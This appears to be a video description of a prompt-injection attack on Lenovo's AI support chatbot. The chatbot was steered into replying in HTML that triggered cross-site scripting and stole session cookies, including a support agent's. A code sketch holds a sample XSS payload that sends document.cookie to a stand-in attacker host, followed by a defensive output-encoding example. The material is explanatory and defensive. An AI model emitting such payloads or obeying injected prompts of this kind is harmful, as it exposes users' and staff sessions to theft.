A single prompt of roughly 400 characters was enough to hijack Lenovo's AI website chatbot. By steering the bot into replying in HTML and embedding a malicious payload, researchers triggered cross-site scripting (XSS), ran script in the victim's browser, and exfiltrated session cookies, even capturing a support agent's cookies once the chat was escalated to a human.
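For context, here is a minimal sketch of the vulnerable pattern being described: if the chat UI assigns the model's reply straight to innerHTML, any markup the attacker talked the bot into emitting becomes live in the victim's session. The payload, the #chat-window selector, and the attacker.example host are illustrative assumptions, not taken from the actual exploit.

```typescript
// Hypothetical sketch, not Lenovo's actual code.
// A reply the attacker steered into HTML: an <img> whose error handler
// ships document.cookie to an attacker-controlled host (illustrative).
const botReply =
  '<img src="x" onerror="fetch(\'https://attacker.example/c?\' + document.cookie)">';

// Vulnerable: rendering the reply as raw HTML fires the onerror handler.
document.querySelector('#chat-window')!.innerHTML = botReply;
```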
This video breaks down the four prompt elements, the root cause (weak input/output sanitisation + “people-pleasing” LLMs), and the real risks: data theft, support system compromise, and lateral movement. We finish with practical guardrails and why bug bounty hunters and red teamers should target AI chatbots right now.
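As a defensive sketch, assuming the guardrail in question is output encoding: treat model output as text, or HTML-encode it before it touches the DOM. The encodeHtml helper and element names below are illustrative, not from the video.

```typescript
// Minimal output-encoding guardrail (illustrative helper).
function encodeHtml(untrusted: string): string {
  return untrusted
    .replace(/&/g, '&amp;')   // must run first, before other entities
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

const botReply = '<img src="x" onerror="alert(1)">'; // sample hostile reply
const chatWindow = document.querySelector('#chat-window')!;

// Safer: render the reply as plain text, never as markup...
chatWindow.textContent = botReply;
// ...or encode it if HTML insertion is unavoidable.
chatWindow.innerHTML = encodeHtml(botReply);
```

Encoding alone is a single layer; pairing it with a strict Content-Security-Policy and HttpOnly cookies limits what an injected payload can do even if one layer fails.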
Topics: lenovo ai chatbot, xss, prompt injection, session cookies, html injection, llm security, chatbot security, ethical hacking, bug bounty, red teaming, ai guardrails, input sanitisation, output encoding, cookie theft, lateral movement
#lenovo #ai #hacked
Category: AI prompts
Tags: lenovo ai chatbot, lenovo chatbot xss, cross site scripting